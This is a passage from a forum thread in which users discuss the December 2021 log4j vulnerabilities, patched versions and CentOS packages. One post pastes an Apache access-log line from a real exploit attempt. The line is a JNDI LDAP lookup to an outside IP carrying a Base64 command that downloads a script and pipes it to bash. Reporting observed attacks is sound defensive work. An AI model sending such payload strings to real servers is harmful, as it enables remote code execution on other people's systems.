Merry log4j2. Unfortunately

Chat
21

image
image594×701 68.4 KB

Close call?

1 Like
23

A little updated section.

log4j v1

Version 1 of log4j is vulnerable to other RCE attacks, and if you’re using it you need to migrate to 2.16.0 .

I’d love to see CentOS upgrade the package to 2.16, without any reference, (changelog reports 2017 as latest update) but i bet that this won’t happen.

https://logging.apache.org/log4j/2.x/manual/migration.html

a bridge seems available, but the code of the software using log4j should by partially anyway updated.

24

According to CheckPoint… Christmas and Hanukkah are gonna to be wild.

Moreover, 2.15.0 increase the security. Anyway…
Who knows if this apocalypse will teach something to software architects and lead developers. (Absolutely no)

1 Like
25

I can confirm that on my two modest servers, Apache logs shows quite a number of exploit tentatives since the 10/12 already :

access_log-20211212:45.155.205.233 - - [10/Dec/2021:14:20:44 +0100] "GET / HTTP/1.1" 403 6487 "-" "${ **jndi** :ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMTYuMjAzLjc0LjEyMTo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xMTYuMjAzLjc0LjEyMTo4MCl8YmFzaA==}"

26

Something today appeared on an installation…

rpm -qa log4j*
log4j-1.2.17-17.el7_4.noarch

Which seems a bugfix release of log4j (and not log4j2, the “overused” flawed package, which has been updated to 2.17 after hurried releases of .15 and .16)

Changelog reports

2021-12-15 - Mikolaj Izdebski mizdebsk@redhat.com - 0:1.2.17-17 - Fix remote code execution vulnerability - Resolves: CVE-2021-4104

and this is not the CVE that originated the apocalypse on the network, but another one.

So…
Is there a way for “shield” attacks on Log4j2 via NethServer? IPS?

28

According to @rijkr over at savapage community

3 Likes
29

For extension… It was not vulnerable to CVE-2021-44228. This vulnerability was fixed, as stated by Apache Foundation, in Log4j 2.17.0 (Java 8), 2.12.3 (Java 7) and 2.3.1 (Java 6).
But it was vulnerable to CVE-2021-4104 until publishment of 1.12.17

Merry coffee and latte.

1 Like
30

New day, new version.
Again? Again. :confounded:
So…
CVE-2021-44832 was unveiled 2 days ago to Apache Foundation, and with a run of new patches, yesterday new versions were available, 2.17.1, 2.12.4, and 2.3.2.
Always talking about Log4j2